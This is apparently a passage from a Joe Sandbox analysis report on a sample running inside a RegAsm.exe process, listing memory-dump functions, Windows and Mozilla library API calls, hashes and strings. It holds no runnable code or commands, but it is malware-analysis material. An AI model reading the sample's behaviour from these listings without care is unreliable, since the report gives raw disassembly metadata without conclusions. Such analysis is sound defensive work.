Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9

Function 0041C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041C33E

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6C0F6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0F6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0F6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C0F6D26

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C0F6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0F6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C0F6D73
free.MOZGLUE(00000000), ref: 6C0F6D80
CertGetNameStringW.CRYPT32 ref: 6C0F6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C0F6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0F6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C0F6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C0F6E10
CryptMsgClose.CRYPT32(00000000), ref: 6C0F6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C0F6E34
CreateFileW.KERNEL32 ref: 6C0F6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C0F6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0F6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C0F709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0F7103
free.MOZGLUE(00000000), ref: 6C0F7153
CloseHandle.KERNEL32(?), ref: 6C0F7176
__Init_thread_footer.LIBCMT ref: 6C0F7209
__Init_thread_footer.LIBCMT ref: 6C0F723A
__Init_thread_footer.LIBCMT ref: 6C0F726B
__Init_thread_footer.LIBCMT ref: 6C0F729C
__Init_thread_footer.LIBCMT ref: 6C0F72DC
__Init_thread_footer.LIBCMT ref: 6C0F730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0F73C2
VerSetConditionMask.NTDLL ref: 6C0F73F3
VerSetConditionMask.NTDLL ref: 6C0F73FF
VerSetConditionMask.NTDLL ref: 6C0F7406
VerSetConditionMask.NTDLL ref: 6C0F740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0F741A
moz_xmalloc.MOZGLUE(?), ref: 6C0F755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0F7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C0F7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0F7598
free.MOZGLUE(00000000), ref: 6C0F75AC

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

Strings

SHA256, xrefs: 6C0F6EC0
wintrust.dll, xrefs: 6C0F72CD
CryptCATAdminReleaseCatalogContext, xrefs: 6C0F72C8
(, xrefs: 6C0F768A

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 344aa610265d245b6e48d483663c5f3071458421229a1b591068e6b49a1439f7
Instruction ID: dca4026bd6f2d64f4a1ea35822dd9e494ad24717d966d319ec5c927603bddcea
Opcode Fuzzy Hash: 344aa610265d245b6e48d483663c5f3071458421229a1b591068e6b49a1439f7
Instruction Fuzzy Hash: A652A2B1A042149BEB21DF29CC84BAA77FCFF45708F104199E92997640DB70ABD5CF91

Function 6C12F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C12F09B

Part of subcall function 6C105B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C1056EE,?,00000001), ref: 6C105B85
Part of subcall function 6C105B50: EnterCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105B90
Part of subcall function 6C105B50: LeaveCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105BD8
Part of subcall function 6C105B50: GetTickCount64.KERNEL32 ref: 6C105BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C12F0AC

Part of subcall function 6C105C50: GetTickCount64.KERNEL32 ref: 6C105D40
Part of subcall function 6C105C50: EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C12F0BE

Part of subcall function 6C105C50: __aulldiv.LIBCMT ref: 6C105DB4
Part of subcall function 6C105C50: LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C105DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C12F155
GetCurrentThreadId.KERNEL32 ref: 6C12F1E0
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F1ED
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F212
GetCurrentThreadId.KERNEL32 ref: 6C12F229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C12F248
GetCurrentThreadId.KERNEL32 ref: 6C12F2AE
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F2BB
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F2F8

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12F350
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F35D
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F381
GetCurrentThreadId.KERNEL32 ref: 6C12F398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F3A0
GetCurrentThreadId.KERNEL32 ref: 6C12F489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F491

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C12F3CF

Part of subcall function 6C12F070: GetCurrentThreadId.KERNEL32 ref: 6C12F440
Part of subcall function 6C12F070: AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F44D
Part of subcall function 6C12F070: ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C12F4A8
GetCurrentThreadId.KERNEL32 ref: 6C12F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F561
GetCurrentThreadId.KERNEL32 ref: 6C12F577
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F585
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C12F239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C12F56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C12F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C12F3A8

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: 8b30c4f52d9b5592cb3cdd3db04334eccc786f03af5e2204b9efaee1b9f6388c
Instruction ID: 3bb4a94162ee5da5e932a0f1e0eef5a13782d755de1eebda504d51461398528f
Opcode Fuzzy Hash: 8b30c4f52d9b5592cb3cdd3db04334eccc786f03af5e2204b9efaee1b9f6388c
Instruction Fuzzy Hash: 4CD13936704214CFDB00DF6AD4187BA77B8EB46368F10456AF97583F80DB789848D7A6

Function 6C0F64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C0F64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C0F64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C0F6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C0F6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0F652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C0F671C
GetCurrentProcess.KERNEL32 ref: 6C0F6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C0F672F
GetCurrentProcess.KERNEL32 ref: 6C0F6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C0F6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C0F6A80
GetSystemInfo.KERNEL32(?), ref: 6C0F6ABE
__Init_thread_footer.LIBCMT ref: 6C0F6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F6AF7

Strings

user32.dll, xrefs: 6C0F6526
nvdxgiwrap.dll, xrefs: 6C0F6513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C0F6798
nvd3d9wrap.dll, xrefs: 6C0F6500
detoured.dll, xrefs: 6C0F64DA
_etoured.dll, xrefs: 6C0F64ED

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 9abdc5a175c5296b3fb71582daece633df441f44cf8a058a6f97c765361c9662
Instruction ID: 072fb08237064f9f631d53ad2133c38b526d660e24ea80e654c07e2cd971bc8f
Opcode Fuzzy Hash: 9abdc5a175c5296b3fb71582daece633df441f44cf8a058a6f97c765361c9662
Instruction Fuzzy Hash: 4BF1B1709052199FDB20CF25CC48BAAB7F5EF46318F1442D9EC29A7641E731AAC6CF90

Function 6C12E2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6C12E2A6), ref: 6C12E35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6C12E2A6), ref: 6C12E386
GetCurrentThreadId.KERNEL32 ref: 6C12E3E4
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6C12E4AB
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E4F5
GetCurrentThreadId.KERNEL32 ref: 6C12E577
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E584
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C12E8A6

Part of subcall function 6C0EB7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0EB7CF
Part of subcall function 6C0EB7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0EB808

Part of subcall function 6C13B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6C160FB6,00000000,?,?,6C12E69E), ref: 6C13B830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6C12E6DA

Part of subcall function 6C13B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6C13B916
Part of subcall function 6C13B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6C13B94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C12E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C12E883

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C12E5A1, 6C12E5CC, 6C12E5FF, 6C12E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C12E722, 6C12E750, 6C12E7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C12E655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C12E826, 6C12E850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C12E777

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

